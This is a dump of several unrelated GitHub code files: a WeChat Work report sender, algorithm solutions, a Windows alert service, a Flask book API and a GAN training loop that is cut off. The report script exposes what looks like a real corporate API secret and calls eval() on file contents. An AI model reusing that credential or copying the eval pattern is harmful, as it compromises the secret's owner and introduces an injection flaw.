{\n\t\t\t\"corpid\": \"wxcee54f67c8e413c9\",\n\t\t\t\"corpsecret\": \"HJ3PW1Yu-GTRQF6zyTSg_j4q0Ga6bQWlVq0LtUiDXkQ\"\n\t\t}\n\t\t# 读取token缓存\n\t\tf = open(\"token.txt\", \"r\")\n\t\ttoken_cache = f.read()\n\t\tf.close()\n\t\ttoken_cache = eval(token_cache)\n\t\t# 判断token缓存是否过期\n\t\tif time.time() < token_cache[\"expires\"]:\n\t\t\tself.token = token_cache[\"access_token\"]\n\t\telse:\n\t\t\t# 获取token\n\t\t\tself.token = requests.get(token_url, token_params).json()\n\t\t\tself.token[\"expires\"] = time.time() + self.token[\"expires_in\"]\n\t\t\tf = open(\"token.txt\", \"w\")\n\t\t\tf.write(str(self.token))\n\t\t\tf.close()\n\t\t\tself.token = self.token[\"access_token\"]\n\t\treturn self.token\n\t# 获取应用信息\n\tdef get_app_info(self):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/agent/get\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t\t\"agentid\": \"1000003\" #应用ID\n\t\t}\n\t\tself.app = requests.get(url, params).json()\n\t\treturn self.app\n\t# 获取标签ID\n\tdef get_tags(self):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/tag/list\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t}\n\t\tself.tags = requests.get(url, params).json()\n\t\treturn self.tags\n\t# 获取成员信息\n\tdef get_user_info(self, id):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/user/get\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t\t\"userid\": id\n\t\t}\n\t\tself.users = requests.get(url, params).json()\n\t\treturn self.users\n\t# 发送文本消息\n\tdef send_text(self, message, tagId=4, userId=None):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/message/send\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t}\n\t\tjsonData = {\n\t\t \"touser\" : userId, #用户ID\n\t\t \"toparty\" : \"\", #部门ID\n\t\t \"totag\" : tagId,\n\t\t \"msgtype\" : \"text\",\n\t\t \"agentid\" : 1000003, #应用ID\n\t\t \"text\" : {\n\t\t\t \"content\" : message\n\t\t },\n\t\t \"safe\":0\n\t\t}\n\t\tresponse = requests.post(url, params=params, json=jsonData).json()\n\t\treturn response\n\t# 上传临时素材,素材上传得到media_id,该media_id仅三天内有效\n\tdef upload_file(self, fileName):\n\t\ttry:\n\t\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/media/upload\"\n\t\t\tparams = {\n\t\t\t\t\"access_token\": self.token,\n\t\t\t\t\"type\": \"file\"\n\t\t\t}\n\t\t\t# requests库不支持上传以中文文件名的文件\n\t\t\tfiles = {'file': open(fileName.encode('utf-8'), 'rb')}\n\t\t\tresponse = requests.post(url, params=params, files=files).json()\n\t\t\tself.media = response[\"media_id\"]\n\t\texcept:\n\t\t\tprint(\"requests不支持中文名文件上传,需要对requests原库进行更改。具体参考:https://www.zhihu.com/question/49583910\")\n\t\tfinally:\n\t\t\treturn response\n\t# 发送附件\n\tdef send_file(self, fileName, userId=None, partyId=None, tagId=\"4\"):\n\t\t# 上传临时素材\n\t\tresponseUpload = self.upload_file(fileName)\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/message/send\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t}\n\t\tjsonData = {\n\t\t \"touser\" : userId,\n\t\t \"toparty\" : partyId,\n\t\t \"totag\" : tagId,\n\t\t \"msgtype\" : \"file\",\n\t\t \"agentid\" : 1000003, #应用ID\n\t\t \"file\" : {\n\t\t\t\t\"media_id\" : self.media\n\t\t },\n\t\t \"safe\":0\n\t\t}\n\t\tresponseSend = requests.post(url, params=params, json=jsonData).json()\n\t\treturn responseUpload, responseSend\n\t# 创建群聊会话\n\tdef creat_group(self, userList, owner=\"2913\", name=None, chatId=None):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/appchat/create\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t}\n\t\tjsonData = {\n\t\t\t\"name\" : name,\n\t\t\t\"owner\" : owner,\n\t\t\t\"userlist\" : userList,\n\t\t\t\"chatid\" : chatId\n\t\t}\n\t\tresponse = requests.post(url, params=params, json=jsonData).json()\n\t\tself.chat = response[\"chatid\"]\n\t\treturn response\n\t# 获取群聊信息\n\tdef get_group_info(self):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/appchat/get\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t\t\"chatid\": self.chat\n\t\t}\n\t\tresponse = requests.get(url, params=params).json()\n\t\treturn response\n\t# 向群聊发送文本消息\n\tdef send_text2chat(self, message):\n\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/appchat/send\"\n\t\tparams = {\n\t\t\t\"access_token\": self.token,\n\t\t}\n\t\tjsonData = {\n\t\t\t\"chatid\": self.chat,\n\t\t\t\"msgtype\":\"text\",\n\t\t\t\"text\":{\n\t\t\t\t\"content\" : message\n\t\t\t},\n\t\t\t\"safe\":0\n\t\t}\n\t\tresponse = requests.post(url, params=params, json=jsonData).json()\n\t\treturn response\n\t# 向群���发送附件\n\tdef send_file2chat(self, fileName):\n\t\ttry:\n\t\t\t# 上传临时素材\n\t\t\tresponseUpload = self.upload_file(fileName)\n\t\t\turl = \"https://qyapi.weixin.qq.com/cgi-bin/appchat/send\"\n\t\t\tparams = {\n\t\t\t\t\"access_token\": self.token,\n\t\t\t}\n\t\t\tjsonData = {\n\t\t\t \"chatid\" : self.chat,\n\t\t\t \"msgtype\" : \"file\",\n\t\t\t \"file\" : {\n\t\t\t\t\t\"media_id\" : self.media\n\t\t\t },\n\t\t\t \"safe\":0\n\t\t\t}\n\t\t\tresponseSend = requests.post(url, params=params, json=jsonData).json()\n\t\t\tif responseSend['errcode'] == 0:\n\t\t\t\tprint(fileName + \"发送成功OK!✔️\")\n\t\texcept:\n\t\t\tprint(\"发送附件失败!\")\n\t\tfinally:\t\n\t\t\treturn responseUpload, responseSend\n\tdef send_excel2chat(self, type):\n\t\t# 上周京东美团\n\t\tif type == 'jd':\n\t\t\tself.send_file2chat(jd.main())\n\t\t# 上周客流\n\t\telif type == 'passengerFlowLastWeek':\n\t\t\tself.send_file2chat(passengerFlow.main('lastweek'))\n\t\t# 上周异常\n\t\telif type == 'unusual':\n\t\t\tfor fileName in unusual.main():\n\t\t\t\tself.send_file2chat(fileName)\n\t\telif type == 'passengerFlowLastMonth':\n\t\t\tself.send_file2chat(passengerFlow.main('lastmonth'))\n\t\telse:\n\t\t\tprint('send_excel2chat报错:非法参数!')\n\t\tprint('----------------------------------------------------------------')\n\n# 将字典格式化为json字符串\ndef echo(dic):\n\tjsonString = json.dumps(dic, ensure_ascii=False, indent=4)\n\tprint(jsonString)\n\treturn jsonString\n\n# 在本地生成所有统计文件\ndef createFile():\n\tarw = arrow.now()\n\t# 进度条\n\tmax_steps = len(JDshops) * 2 + arw.shift(months=-1).ceil('month').day * 2 + len(DIC) + 7*2 + len(DIC) + 4\n\tprocess_bar = ShowProcess(max_steps, '恭喜, 成功导出数据!')\n\n\t# 上周京东美团\n\tjd.main(process_bar)\n\t# 上周客流\n\tpassengerFlow.main('lastweek', process_bar)\n\t# 上周异常\n\tunusual.main(process_bar)\n\t# 上月客流\n\tpassengerFlow.main('lastmonth', process_bar)\n\n# 设置时间自动发送文件到群里\ndef setTime2Do():\n\t# 设定时间\n\tmonday = {\n\t\t'day_of_week': '2', # 0-6为周一到周日\n\t\t'hour': 10,\n\t\t'minute': 29\n\t}\n\tfirstDay = {\n\t\t'day': '25', # 几号\n\t\t'hour': 10,\n\t\t'minute': 29\n\t}\n\tscheduler = BlockingScheduler()\n\t\n\twx = Wxwork()\n\t# 上周京东美团\n\tscheduler.add_job(wx.send_excel2chat, 'cron', ['jd'], **monday)\n\t# 上周客流\n\tscheduler.add_job(wx.send_excel2chat, 'cron', ['passengerFlowLastWeek'], **monday)\n\t# 上周异常\n\tscheduler.add_job(wx.send_excel2chat, 'cron', ['unusual'], **monday)\n\t# 上月客流\n\tscheduler.add_job(wx.send_excel2chat, 'cron', ['passengerFlowLastMonth'], **firstDay)\n\tscheduler.start()\n\nif __name__ == '__main__':\n\t# 定时执行\n\t# setTime2Do()\n\t\n\t# 手动执行\n\t# 仅生成文件\n\tcreateFile()\n\t# 生成并发送文件\n\t# wx = Wxwork()\n\t# wx.send_excel2chat('jd')\n\t# wx.send_excel2chat('passengerFlowLastWeek')\n\t# wx.send_excel2chat('unusual')\n\t# wx.send_excel2chat('passengerFlowLastMonth')\n\ttime.sleep(30)","repo_name":"Humecry/Weekly","sub_path":"report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"70515358187","text":"def twoSum(nums, target):\n if nums == None:\n return [0,0]\n required = {}\n for i in range(len(nums)):\n if target - nums[i] in required:\n return [required[target - nums[i]],i]\n else:\n required[nums[i]] = i\n\nn = int(input())\ninput_list = []\n\nfor i in range(n):\n input_list.append(int(input()))\n\ntarget = int(input())\n\nprint(twoSum(input_list, target))","repo_name":"kfahad5607/PlacePrep","sub_path":"onlineJudge/questions/two-sum/python/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71610508268","text":"import win32serviceutil\nimport win32service\nimport win32event\nimport servicemanager\nimport win32ts\nimport win32profile\nimport win32process\nimport win32con\n\nimport socket\nimport requests\nimport time\nimport sys\n\n\nclass ExampleService(win32serviceutil.ServiceFramework):\n _svc_name_ = \"AlertService\"\n _svc_display_name_ = \"Alert Service\"\n _svc_description_ = \"Description\"\n\n def __init__(self, args):\n win32serviceutil.ServiceFramework.__init__(self, args)\n self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\n socket.setdefaulttimeout(60)\n\n def SvcDoRun(self):\n servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,\n servicemanager.PYS_SERVICE_STARTED,\n (self._svc_name_, ''))\n self.main()\n\n def SvcStop(self):\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n win32event.SetEvent(self.hWaitStop)\n\n def main(self):\n with open(\"C:\\\\Users\\\\Default\\\\AppData\\\\Roaming\\\\CorporationChat\\\\path.txt\", \"r\") as file:\n appdata_path = file.read()\n console_session_id = win32ts.WTSGetActiveConsoleSessionId()\n console_user_token = win32ts.WTSQueryUserToken(console_session_id)\n environment = win32profile.CreateEnvironmentBlock(console_user_token, False)\n startupInfo = win32process.STARTUPINFO()\n startupInfo.dwFlags = win32process.STARTF_USESHOWWINDOW\n startupInfo.wShowWindow = win32con.SW_NORMAL\n\n while True:\n try:\n with open(appdata_path + \"\\\\alert\\\\groups.json\", \"r\") as file:\n groups = file.read()\n if len(groups) == 0:\n time.sleep(30)\n result = requests.get(f\"https://chat-b4ckend.herokuapp.com/alert/?groups={groups}\")\n if result.status_code == 200:\n with open(\"C:\\\\Users\\\\dakfa\\\\Desktop\\\\test.txt\", \"a\") as file:\n file.write(str(result.json()) + \"\\n\")\n if result.json():\n win32process.CreateProcessAsUser(console_user_token,\n appdata_path + \"\\\\alert\\\\alert.exe\",\n None, None, None, 0, win32con.NORMAL_PRIORITY_CLASS,\n environment, None, startupInfo)\n time.sleep(15)\n time.sleep(7)\n except Exception as e:\n with open(\"C:\\\\Users\\\\dakfa\\\\Desktop\\\\errors.txt\", \"a\") as file:\n file.write(str(e))\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n servicemanager.Initialize()\n servicemanager.PrepareToHostSingle(ExampleService)\n servicemanager.StartServiceCtrlDispatcher()\n else:\n # pyinstaller --hiddenimport win32timezone AlertService.py\n # sc queryex AlertService\n # taskkill /PID 1084 /F\n win32serviceutil.HandleCommandLine(ExampleService)\n","repo_name":"Delivery-Klad/chat_service","sub_path":"AlertService.py","file_name":"AlertService.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22525797197","text":"import heapq\n\nclass Solution:\n \"\"\" \n With heapify:\n n ~ len(s)\n time complexity: O(n) because the freqMap for loop, heapify, and while loop all take O(n)\n space complexity: O(n), freqMap, heap all take O(n)\n With heappush:\n time complexity: O(n) because the O(nlogn) time complexity of heapush is overpowered by for and while loop\n The O(logn) time of heappop is also overpowered by for and while loop.\n space complexity: O(n)\n \"\"\"\n def frequencySort(self, s: str) -> str:\n freqMap = {}\n\n # get freq count\n for i,c in enumerate(s):\n if c in freqMap.keys():\n freqMap[c] += 1\n else:\n freqMap[c] = 1\n\n # freq is made negative to make max heap\n #tupList = [(-freq, ch) for ch, freq in freqMap.items()]\n #heapq.heapify(tupList) # O(n) time complexity\n \n tupList = []\n for ch in freqMap:\n freq = freqMap[ch]\n heapq.heappush(tupList, (-freq, ch)) #O(nlogn) time complexity\n\n # rebuild string\n sOut = \"\"\n while len(tupList) > 0: # O(n) time\n tup = heapq.heappop(tupList) #O(logn) time \n freq, ch = tup[0], tup[1]\n sOut += ch*(-freq)\n \n return sOut\n\nclass Solution2:\n def frequencySort(self, s: str) -> str:\n freqMap = {}\n\n # get freq count\n for i,c in enumerate(s):\n if c in freqMap.keys():\n freqMap[c] += 1\n else:\n freqMap[c] = 1\n \n # print(\"freqMap: \", freqMap)\n\n tupList = [(v,k) for k,v in freqMap.items()]\n # print(\"tupList: \", tupList)\n\n tupList = sorted(tupList, key = lambda x: x[0])\n # print(\"tupList after sort: \", tupList)\n\n # rebuild string\n sOut = \"\"\n for i in range(len(tupList)-1, -1, -1):\n tup = tupList[i]\n f, c = tup[0], tup[1]\n sOut += c*f\n \n return sOut","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/leetcode/lc451_sort_chars_by_freq.py","file_name":"lc451_sort_chars_by_freq.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"42140244397","text":"import sys\ninput = sys.stdin.readline\n\nN = int(input())\nnumbers = list(map(int, input().split()))\n# 직전 숫자가 포함된 결과, 직전 숫자를 포함하지 않는 결과\ndp = [0] * N\ndp[0] = numbers[0]\nret = numbers[0]\n\nfor n in range(1, N):\n dp[n] = max(numbers[n], dp[n - 1] + numbers[n])\n \n if dp[n] > ret:\n ret = dp[n]\n\nprint(ret)","repo_name":"W1nU/algorithm","sub_path":"first/1912.py","file_name":"1912.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22572638165","text":"from typing import List\n\n\nclass Solution:\n def simplifiedFractions(self, n: int) -> List[str]:\n i = 1\n res, seen = [], set()\n while i < n:\n for j in range(i + 1, n + 1):\n if i != j and i / j not in seen:\n res.append(str(i) + \"/\" + str(j))\n seen.add(i / j)\n i += 1\n return res\n","repo_name":"sanial2001/DP","sub_path":"simplified fraction.py","file_name":"simplified fraction.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21762679164","text":"\nimport boto3\nimport os\nimport json\nfrom datetime import datetime\n\n\ndef create_event(event_source, event_name, event_json, s3_bucket):\n\tevent_source = event_source\n\tevent_name = event_name\n\tevent_json = event_json\n\ts3_bucket = s3_bucket\n\n\ttimestamp = datetime.now().isoformat()\n\tevent_json[\"eventProcessingTimestamp\"] = timestamp\n\tevent_desc = f\"{event_source}__{event_name}.json\"\n\tif \"simple_description\" in event_json:\n\t\tevent_desc = event_json[\"simple_description\"].replace(\" \", \"__\") + \".json\"\n\n\tlast_occurrence_key = f\"events/last-occurrence/{event_desc}\"\n\tescaped_time = timestamp[11:23].replace(\":\", \"-\")\n\thistory_key = f\"events/history/{timestamp[0:4]}/{timestamp[5:7]}/{timestamp[8:10]}/{escaped_time}_{event_desc}\"\n\n\ts3 = boto3.client(\"s3\")\n\ts3.put_object(Bucket=s3_bucket, Key=last_occurrence_key, Body=json.dumps(event_json, indent=3))\n\ts3.put_object(Bucket=s3_bucket, Key=history_key, Body=json.dumps(event_json, indent=3))\n\n\tresults = {\"last_occurrence_key\" : last_occurrence_key, \"history_key\" : history_key}\n\treturn results\n\n\n\n\t\n","repo_name":"stevezieglerva/python-linting-formatting-test","sub_path":"input/process_alarms/EventInfo.py","file_name":"EventInfo.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2695703683","text":"import threading\n\nclass testImageThread (threading.Thread): \n def __init__(self, threadID, name, imageArray, limits, featureList, window, slide):\n self.imgArr= imageArray\n self.limits=limits\n self.featureList=featureList\n self.window=window\n self.slide=slide\n self.cf= calculateFeatures(featuresList)\n self.result=numpy.zeros([])\n \n def run(self):\n self.walkImage()\n \n def walkImage():\n '''\n input: input image, window size in pixels, slide in pixels\n output: saves calculated features to instance variable \"result\"\n '''\n for startX in xrange(imgArr.shape[0]):\n endX=startX+self.window\n for startY in xrange(imgArr.shape[1]):\n endY=startY+window\n subImage= imgArr[startX:endX, startY:endY, :]\n result.append(cf.getFeatures(subImage))","repo_name":"aplassard/Image_Processing","sub_path":"myThread.py","file_name":"myThread.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33391597587","text":"\"\"\"\n Created by Amirk on 2018-07-26.\n\"\"\"\nfrom flask import Blueprint, request\nfrom app.libs.error_code import Success, NotFound\nfrom app.libs.token_auth import auth\nfrom app.model.book_chapter import BookChapter\nfrom app.model.book_novel_info import BookInfo\nfrom app.plugin.novel_spider import Spider\nfrom app.vaildators.forms import ContentTextForm, BookByCategorieForm\n\napi = Blueprint('book', __name__)\n\n\n@api.route('/v1/book/search')\ndef search():\n \"\"\"搜索书籍\"\"\"\n form = ContentTextForm(request.args)\n if form.validate():\n query = form.data.get('query')\n bookinfo = BookInfo.check_to_book(title=query)\n if bookinfo:\n data = bookinfo\n else:\n spider = Spider(query=query)\n data = spider.search_query()\n print(data)\n return Success(data=data)\n return NotFound()\n\n\n@api.route('/v1/book/bookinfo/')\ndef bookinfo(id):\n \"\"\"书籍详情信息\"\"\"\n bookinfo = BookInfo.check_to_book(id=id)\n if bookinfo and bookinfo.get('longIntro') is not None:\n datas = bookinfo\n else:\n spider = Spider(id)\n datas = spider.bookinfo_spider()\n return Success(data=datas)\n\n\n@api.route('/v1/book//recommend')\ndef book_recommend(id):\n \"\"\"推荐小说\"\"\"\n spider = Spider(id=id)\n data = spider.book_recommend_spider()\n return Success(data=data)\n\n\n@api.route('/v1/book/accurate')\ndef accurate_author():\n \"\"\"精确作者搜索\"\"\"\n author = request.args.get('author')\n book_author = BookInfo.check_to_book(author=author)\n if book_author:\n data = book_author\n else:\n spider = Spider(author=author)\n data = spider.book_author_spider()\n return Success(data=data)\n\n\n@api.route('/v1/book/chapter/')\ndef book_chapter_list(id):\n \"\"\"书籍目录\"\"\"\n books = BookChapter.check_to_book_chapter(id)\n if books:\n data = books\n else:\n spider = Spider(id=id)\n data = spider.book_chapter_spider()\n return Success(data=data)\n\n\n@api.route('/v1/book/chapter/parse')\n@auth.login_required\ndef book_chpater_text():\n \"\"\"章节内容\"\"\"\n form = ContentTextForm(request.args)\n if form.validate():\n query = form.data.get('query')\n books = BookChapter.check_to_book_text(query)\n if books:\n content_text = books\n else:\n spider = Spider()\n content_text = spider.book_chapter_text_spider(query)\n content_text['chapterText'] = [temp for temp in content_text.get('chapterText').split('\\n')]\n content__on_down = BookChapter.check_to_text_on_or_down(query) # 返回的下一章\n data = {\n \"content_text\": content_text,\n \"content__on_down\": content__on_down\n }\n return Success(data=data)\n return NotFound()\n\n\n@api.route('/v1/book/search_sub')\ndef search_sup_query():\n \"\"\"搜索自动补充\"\"\"\n form = ContentTextForm(request.args)\n if form.validate():\n query = form.data.get('query')\n spider = Spider()\n data = spider.book_search_sub_query(query)\n return Success(data=data)\n\n\n@api.route('/v1/book/hot_words')\ndef hot_words():\n \"\"\"搜索热词\"\"\"\n spider = Spider()\n data = spider.book_search_hot_words()\n return Success(data=data)\n\n\n@api.route('/v1/book/statistics')\ndef book_statistics():\n \"\"\"获取所有分类\"\"\"\n spider = Spider()\n data = spider.book_statistics_type()\n return Success(data=data)\n\n@api.route('/v1/book/by-categories')\ndef book_by_categories():\n \"\"\"\n 根据分类获取小说列表\n \"\"\"\n spider = Spider()\n form = BookByCategorieForm(request.args)\n if form.validate():\n data = spider.book_by_categories_spider(form.data)\n return Success(data=data)\n else:\n return NotFound()","repo_name":"wanws/BookApplet","sub_path":"books/books/server/novel/app/api/v1/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1082768921","text":"import os\nimport time\nimport copy\nimport json\nimport pickle\nimport psutil\nimport PIL.Image\nimport numpy as np\nimport random\nimport torch\nimport dnnlib\nfrom torch_utils import misc\nfrom torch_utils import training_stats\nfrom torch_utils.ops import conv2d_gradfix\nfrom torch_utils.ops import grid_sample_gradfix\nimport torchvision\n\nimport legacy\nfrom metrics_styleinv import metric_main\nfrom einops import rearrange\n#----------------------------------------------------------------------------\n\ndef setup_snapshot_image_grid(training_set, random_seed=0):\n rnd = np.random.RandomState(random_seed)\n gw, gh = 5, 5\n\n # No labels => show random subset of training samples.\n training_set.return_one = True\n all_indices = list(range(training_set.total_frames))\n rnd.shuffle(all_indices)\n grid_indices = [all_indices[i % len(all_indices)] for i in range(gw * gh)]\n\n # Load data.\n images = [training_set[i].copy() for i in grid_indices]\n training_set.return_one = False\n return (gw, gh), np.stack(images)\n\ndef convert_batch_videos_to_grid(batch_videos, grid_size): # (b,c,t,h,w) -> (t, H, W, c)\n gw, gh = grid_size\n _N, C, T, H, W = batch_videos.shape\n videos = batch_videos.reshape(gh, gw, C, T, H, W)\n videos = videos.permute(3, 0, 4, 1, 5, 2)\n videos = videos.reshape(T, gh*H, gw*W, C)\n return videos\n\ndef setup_snapshot_video_grid(training_set_kwargs, grid_size=(5,5), random_seed=0):\n gw, gh = grid_size\n rnd = np.random.RandomState(random_seed)\n svdata_kwargs = copy.deepcopy(training_set_kwargs)\n svdata_kwargs.return_vid = True\n svdata = dnnlib.util.construct_class_by_name(**svdata_kwargs)\n all_indices = list(range(svdata.n_videos))\n rnd.shuffle(all_indices)\n grid_indices = [all_indices[i % len(all_indices)] for i in range(gw * gh)]\n\n # Load data.\n videos = torch.cat([torch.from_numpy(svdata[i]).unsqueeze(0) for i in grid_indices]) # (b, c, t, h, w)\n del svdata\n return convert_batch_videos_to_grid(videos, grid_size)\n#----------------------------------------------------------------------------\n\ndef save_image_grid(img, fname, drange, grid_size):\n lo, hi = drange\n img = np.asarray(img, dtype=np.float32)\n img = (img - lo) * (255 / (hi - lo))\n img = np.rint(img).clip(0, 255).astype(np.uint8)\n\n gw, gh = grid_size\n _N, C, H, W = img.shape\n img = img.reshape(gh, gw, C, H, W)\n img = img.transpose(0, 3, 1, 4, 2)\n img = img.reshape(gh * H, gw * W, C)\n\n assert C in [1, 3]\n if C == 1:\n PIL.Image.fromarray(img[:, :, 0], 'L').save(fname)\n if C == 3:\n PIL.Image.fromarray(img, 'RGB').save(fname)\n\n#----------------------------------------------------------------------------\n\ndef generate_visualize_videos(SI, G_synthesis, grid_batch=1, grid_x=None, grid_wc=None, grid_zm=None, grid_Ts=None, grid_num_ws=14, noise_mode='none'):\n grid_videos, grid_image = [], []\n for grid_idx in range(grid_batch):\n grid_styles = SI(\n grid_x[grid_idx : grid_idx + 1],\n grid_wc[grid_idx : grid_idx + 1],\n grid_zm[grid_idx : grid_idx + 1] if grid_zm is not None else None,\n grid_Ts,\n run_parallel=True,\n return_temporal_style=False\n )\n grid_styles_b = grid_styles.unsqueeze(1).repeat([1, grid_num_ws, 1])\n grid_vid = G_synthesis(grid_styles_b, noise_mode=noise_mode).cpu() # (t, c, h, w)\n grid_image.append(grid_x[grid_idx:grid_idx+1].cpu())\n grid_image.append(grid_vid[0:1])\n grid_videos.append(grid_vid.unsqueeze(0))\n \n grid_images = torch.cat(grid_image).numpy() # (b*2, c, h, w)\n grid_videos = torch.cat(grid_videos) # (b, t, c, h, w)\n assert grid_videos.ndim == 5\n grid_videos = grid_videos.permute(0, 2, 1, 3, 4) # (b, c, t, h, w)\n # grid_videos: \n return grid_videos, grid_images\n\ndef training_loop(\n run_dir = '.', # Output directory.\n visualize_args = {}, # Visualize args: viz_len, fps\n training_set_kwargs = {}, # Options for training set.\n data_loader_kwargs = {}, # Options for torch.utils.data.DataLoader.\n checkpoint = '', # PKL of pretrained pSp and StyleGAN2\n SI_kwargs = {}, # Options for generator network.\n D_kwargs = {}, # Options for discriminator network.\n SI_opt_kwargs = {}, # Options for generator optimizer.\n D_opt_kwargs = {}, # Options for discriminator optimizer.\n augment_kwargs = None, # Options for augmentation pipeline. None = disable.\n loss_kwargs = {}, # Options for loss function.\n metrics = [], # Metrics to evaluate during training.\n random_seed = 0, # Global random seed.\n num_gpus = 1, # Number of GPUs participating in the training.\n rank = 0, # Rank of the current process in [0, num_gpus[.\n batch_size = 4, # Total batch size for one training iteration. Can be larger than batch_gpu * num_gpus.\n batch_gpu = 4, # Number of samples processed at a time by one GPU.\n ema_kimg = 10, # Half-life of the exponential moving average (EMA) of generator weights.\n ema_rampup = None, # EMA ramp-up coefficient.\n G_reg_interval = 4, # How often to perform regularization for G? None = disable lazy regularization.\n D_reg_interval = 16, # How often to perform regularization for D? None = disable lazy regularization.\n augment_p = 0, # Initial value of augmentation probability.\n ada_target = None, # ADA target value. None = fixed p.\n ada_interval = 4, # How often to perform ADA adjustment?\n ada_kimg = 500, # ADA adjustment speed, measured in how many kimg it takes for p to increase/decrease by one unit.\n total_kimg = 25000, # Total length of the training, measured in thousands of real images.\n kimg_per_tick = 4, # Progress snapshot interval.\n image_snapshot_ticks = 50, # How often to save image snapshots? None = disable.\n network_snapshot_ticks = 50, # How often to save network snapshots? None = disable.\n resume_pkl = None, # Network pickle to resume training from.\n resume_whole_state = False, # Should we resume the whole state or only the G/D/G_ema checkpoints?\n cudnn_benchmark = True, # Enable torch.backends.cudnn.benchmark?\n allow_tf32 = False, # Enable torch.backends.cuda.matmul.allow_tf32 and torch.backends.cudnn.allow_tf32?\n abort_fn = None, # Callback function for determining whether to abort training. Must return consistent results across ranks.\n progress_fn = None, # Callback function for updating training progress. Called for all ranks.\n):\n # Initialize.\n start_time = time.time()\n device = torch.device('cuda', rank)\n this_random_seed = random_seed * num_gpus + rank\n random.seed(this_random_seed)\n np.random.seed(this_random_seed)\n torch.manual_seed(this_random_seed)\n torch.backends.cudnn.benchmark = cudnn_benchmark # Improves training speed.\n torch.backends.cuda.matmul.allow_tf32 = allow_tf32 # Allow PyTorch to internally use tf32 for matmul\n torch.backends.cudnn.allow_tf32 = allow_tf32 # Allow PyTorch to internally use tf32 for convolutions\n conv2d_gradfix.enabled = True # Improves training speed.\n grid_sample_gradfix.enabled = True # Avoids errors with the augmentation pipe.\n\n # Load training set.\n if rank == 0:\n print('Loading training set...')\n training_set = dnnlib.util.construct_class_by_name(**training_set_kwargs) # subclass of training.dataset.Dataset\n training_set_sampler = misc.InfiniteSampler(dataset=training_set, rank=rank, num_replicas=num_gpus, seed=random_seed)\n training_set_iterator = iter(torch.utils.data.DataLoader(dataset=training_set, sampler=training_set_sampler, batch_size=batch_size//num_gpus, **data_loader_kwargs))\n if rank == 0:\n print()\n print('Num videos: ', training_set.n_videos)\n print('Num frames: ', training_set.total_frames)\n print('Image shape:', training_set.img_resolution)\n print('Sampling: ', training_set.sampling_cfg.type)\n print()\n\n # Construct networks.\n if rank == 0:\n print('Constructing networks...')\n with open(checkpoint, 'rb') as f:\n G = pickle.load(f)['G'].eval().requires_grad_(False).to(device)\n loss_kwargs.num_ws = G.synthesis.num_ws\n SI = dnnlib.util.construct_class_by_name(**SI_kwargs).train().requires_grad_(False).to(device)\n SI.set_latent_avg(G.mapping.w_avg.detach())\n D = dnnlib.util.construct_class_by_name(**D_kwargs).train().requires_grad_(False).to(device) # subclass of torch.nn.Module\n SI_ema = copy.deepcopy(SI).eval()\n\n # Resume from existing pickle.\n if resume_pkl is not None:\n print(f'Resuming from \"{resume_pkl}\"')\n with open(resume_pkl, 'rb') as f:\n resume_data = pickle.load(f)\n for name, module in [('G', G), ('D', D), ('SI', SI), ('SI_ema', SI_ema)]:\n misc.copy_params_and_buffers(resume_data[name], module, require_all=False)\n\n # Print network summary tables.\n content_dim = SI_kwargs.mapping_opts.content_dim\n motion_type = SI_kwargs.mapping_opts.motion.type\n require_motion_always = False\n if motion_type == 'motion_and_pe':\n motion_dim = SI_kwargs.mapping_opts.motion.motion_dim\n require_motion_always = True\n elif motion_type == 'acyclic_pe':\n max_num_frames = SI_kwargs.mapping_opts.sampling.max_num_frames\n motion_z_distance = SI_kwargs.mapping_opts.motion.motion_z_distance\n motion_dim = [max_num_frames // motion_z_distance + 1, SI_kwargs.mapping_opts.motion.z_dim]\n require_motion_always = False\n\n noise_mode = loss_kwargs.noise_mode\n if rank == 0:\n # prepare inputs\n zc = torch.randn([batch_gpu, content_dim], device=device)\n zm = torch.randn([batch_gpu, motion_dim], device=device) if require_motion_always else None\n g_frames = 